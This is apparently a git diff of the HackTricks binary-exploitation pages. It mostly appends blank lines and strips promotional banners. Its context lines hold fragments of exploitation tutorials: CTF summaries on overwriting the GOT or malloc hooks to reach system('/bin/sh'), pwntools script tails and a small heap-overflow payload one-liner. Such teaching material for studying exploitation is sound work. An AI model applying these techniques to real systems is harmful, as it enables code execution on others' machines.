a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md index 996facccb..d0049d024 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md @@ -94,3 +94,5 @@ According to [**some observation from this post**](https://github.com/florianhof According to that blog post it's recommended to add a short delay between requests to the server is introduced. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md index 59b406c5e..66d2ead05 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md @@ -33,3 +33,5 @@ If Full RELRO is enabled, the only way to bypass it is to find another way that Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.** {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 5c1044b98..466cf3db5 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -74,3 +74,5 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/ - [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 89eee29ec..8bc7f50f3 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -119,3 +119,5 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. + + diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index e4d3eed44..0a455a595 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -31,3 +31,5 @@ With an **arbitrary read** like the one provided by format **strings** it might - This challenge abuses in a very simple way a format string to read the canary from the stack {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/common-exploiting-problems.md b/src/binary-exploitation/common-exploiting-problems.md index 1aaf06372..662aac265 100644 --- a/src/binary-exploitation/common-exploiting-problems.md +++ b/src/binary-exploitation/common-exploiting-problems.md @@ -36,3 +36,5 @@ In order to bypass this the **escape character `\x16` must be prepended to any ` **Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.** {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 3d7bfa018..b687806c2 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Basic Information @@ -242,10 +237,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands. -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md index 0665b14a1..c8b15a038 100644 --- a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md +++ b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md @@ -182,3 +182,5 @@ p.close()
{{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/format-strings/format-strings-template.md b/src/binary-exploitation/format-strings/format-strings-template.md index 71e1d4624..95e2f1e80 100644 --- a/src/binary-exploitation/format-strings/format-strings-template.md +++ b/src/binary-exploitation/format-strings/format-strings-template.md @@ -143,3 +143,5 @@ P.interactive() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/integer-overflow.md b/src/binary-exploitation/integer-overflow.md index cf1a6ca4f..e33badf8f 100644 --- a/src/binary-exploitation/integer-overflow.md +++ b/src/binary-exploitation/integer-overflow.md @@ -121,3 +121,5 @@ In this example, if a user inputs a negative number, it will be interpreted as a This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index dbf5dc009..77f327780 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md @@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) { With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). + + diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 319126fe0..2e8fdc012 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -527,3 +527,5 @@ heap-memory-functions/heap-functions-security-checks.md - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/) - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) + + diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index eb184fc93..b39f0f605 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -638,3 +638,5 @@ heap-memory-functions/heap-functions-security-checks.md - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/double-free.md b/src/binary-exploitation/libc-heap/double-free.md index a30116d58..e6826e65f 100644 --- a/src/binary-exploitation/libc-heap/double-free.md +++ b/src/binary-exploitation/libc-heap/double-free.md @@ -130,3 +130,5 @@ h1: 0xaaab0f0c2380 - [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index c36c675de..9ddcde54d 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -151,3 +151,5 @@ unsorted-bin-attack.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md index 04855d5fb..24d8c3dbb 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md @@ -5,3 +5,5 @@ ## {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md index e57b1fa77..c9b6fa11a 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md @@ -384,3 +384,5 @@ _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index 18a0a02b7..60d5e2019 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md @@ -161,3 +161,5 @@ free.md - Error message: `realloc(): invalid next size` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md index 3b2ab7085..0199e5b87 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md @@ -1744,3 +1744,5 @@ sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md index 7d26f6546..c27847032 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md @@ -81,3 +81,5 @@ Heap leaks: - If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/heap-overflow.md b/src/binary-exploitation/libc-heap/heap-overflow.md index 24ea86a70..17e6e72f0 100644 --- a/src/binary-exploitation/libc-heap/heap-overflow.md +++ b/src/binary-exploitation/libc-heap/heap-overflow.md @@ -48,3 +48,5 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-einherjar.md b/src/binary-exploitation/libc-heap/house-of-einherjar.md index 28c6fd437..11b2c1b9e 100644 --- a/src/binary-exploitation/libc-heap/house-of-einherjar.md +++ b/src/binary-exploitation/libc-heap/house-of-einherjar.md @@ -47,3 +47,5 @@ - Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-force.md b/src/binary-exploitation/libc-heap/house-of-force.md index 7d4fb9247..57ba9fee6 100644 --- a/src/binary-exploitation/libc-heap/house-of-force.md +++ b/src/binary-exploitation/libc-heap/house-of-force.md @@ -62,3 +62,5 @@ Then, do another malloc to get a chunk at the target address. - Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-lore.md b/src/binary-exploitation/libc-heap/house-of-lore.md index 862ba7323..58fa1f554 100644 --- a/src/binary-exploitation/libc-heap/house-of-lore.md +++ b/src/binary-exploitation/libc-heap/house-of-lore.md @@ -45,3 +45,5 @@ Then you will be able to allocate `fake0`. - [https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-orange.md b/src/binary-exploitation/libc-heap/house-of-orange.md index e57f477c6..42ace40b5 100644 --- a/src/binary-exploitation/libc-heap/house-of-orange.md +++ b/src/binary-exploitation/libc-heap/house-of-orange.md @@ -73,3 +73,5 @@ This approach exploits heap management mechanisms, libc information leaks, and h - [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-rabbit.md b/src/binary-exploitation/libc-heap/house-of-rabbit.md index 230b7c63e..ad794d63f 100644 --- a/src/binary-exploitation/libc-heap/house-of-rabbit.md +++ b/src/binary-exploitation/libc-heap/house-of-rabbit.md @@ -109,3 +109,5 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index a3deaf939..b57aab2c2 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md @@ -116,3 +116,5 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/house-of-spirit.md b/src/binary-exploitation/libc-heap/house-of-spirit.md index 1ce36fd14..522f24b9d 100644 --- a/src/binary-exploitation/libc-heap/house-of-spirit.md +++ b/src/binary-exploitation/libc-heap/house-of-spirit.md @@ -116,3 +116,5 @@ int main() { - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index fb8a721c9..7e12332f9 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md @@ -56,3 +56,5 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http - FSOP is needed to finish the exploit. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/off-by-one-overflow.md b/src/binary-exploitation/libc-heap/off-by-one-overflow.md index 000044db5..d344fc0f6 100644 --- a/src/binary-exploitation/libc-heap/off-by-one-overflow.md +++ b/src/binary-exploitation/libc-heap/off-by-one-overflow.md @@ -113,3 +113,5 @@ This image explains perfectly the attack: - Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md index 117f462b6..bae6b6aec 100644 --- a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md +++ b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md @@ -21,3 +21,5 @@ It might be possible to **overflow an allocated chunk having next a freed chunk* In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index 7c69db95c..178f14589 100644 --- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md @@ -45,3 +45,5 @@ Usually it's possible to find at the beginning of the heap a chunk containing th - **Tcache poisoning** to get an arbitrary write primitive. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/unlink-attack.md b/src/binary-exploitation/libc-heap/unlink-attack.md index 959ff36db..1a665428e 100644 --- a/src/binary-exploitation/libc-heap/unlink-attack.md +++ b/src/binary-exploitation/libc-heap/unlink-attack.md @@ -127,3 +127,5 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before - There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 65d509c48..89e3f968b 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md @@ -71,3 +71,5 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index d6fd34f42..069a673d7 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md @@ -18,3 +18,5 @@ first-fit.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md index 7bab07aea..115d3e19b 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md +++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md @@ -62,3 +62,5 @@ d = malloc(20); // a - It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag. - [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html) - In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it. + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 29e21bca5..82d3cf9c6 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -193,3 +193,5 @@ rop-syscall-execv/ - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 94d93bd6f..ff67ec4bf 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md @@ -122,3 +122,5 @@ Behaviour signatures to find those functions: - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 73cbb4e58..f16f67516 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -182,3 +182,5 @@ target.interactive() Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index 1fc2ea86a..b3a3c1ab8 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -195,3 +195,5 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md index 868f6ffa5..7837a1283 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md @@ -187,3 +187,5 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index c213407d3..755c3cfd8 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md @@ -163,3 +163,5 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md index 5b24ece5f..58dce3570 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md @@ -35,3 +35,5 @@ angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md index a9cfca917..a45f91052 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md @@ -215,3 +215,5 @@ p.interactive() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index fb453a1ba..36a43d76e 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md @@ -302,3 +302,5 @@ BINSH = next(libc.search("/bin/sh")) - 64 ``` {{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md index def2864f4..e30884959 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -2,9 +2,6 @@ {{#include ../../../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ```python:template.py from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools @@ -222,8 +219,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**: BINSH = next(libc.search("/bin/sh")) - 64 ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index a3a6c9ed5..76002a8f0 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -67,3 +67,5 @@ srop-sigreturn-oriented-programming/srop-arm64.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index 444927dfd..19e1ce68b 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md @@ -193,3 +193,5 @@ target.interactive() - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index 5b912eab8..abcc529f9 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md @@ -126,3 +126,5 @@ p.interactive() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 20e07f3f2..06cfe6a0d 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -143,3 +143,5 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index ad3191732..fbb2e56a7 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -190,3 +190,5 @@ And to bypass the address of `/bin/sh` you could create several env variables po {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 6de6060f2..54dccee09 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -102,3 +102,5 @@ There are several protections trying to prevent the exploitation of vulnerabilit {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/pointer-redirecting.md b/src/binary-exploitation/stack-overflow/pointer-redirecting.md index f92bebd28..9213444ef 100644 --- a/src/binary-exploitation/stack-overflow/pointer-redirecting.md +++ b/src/binary-exploitation/stack-overflow/pointer-redirecting.md @@ -27,3 +27,5 @@ You can find an example in: - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index 0cad69c6d..52ef909dc 100644 --- 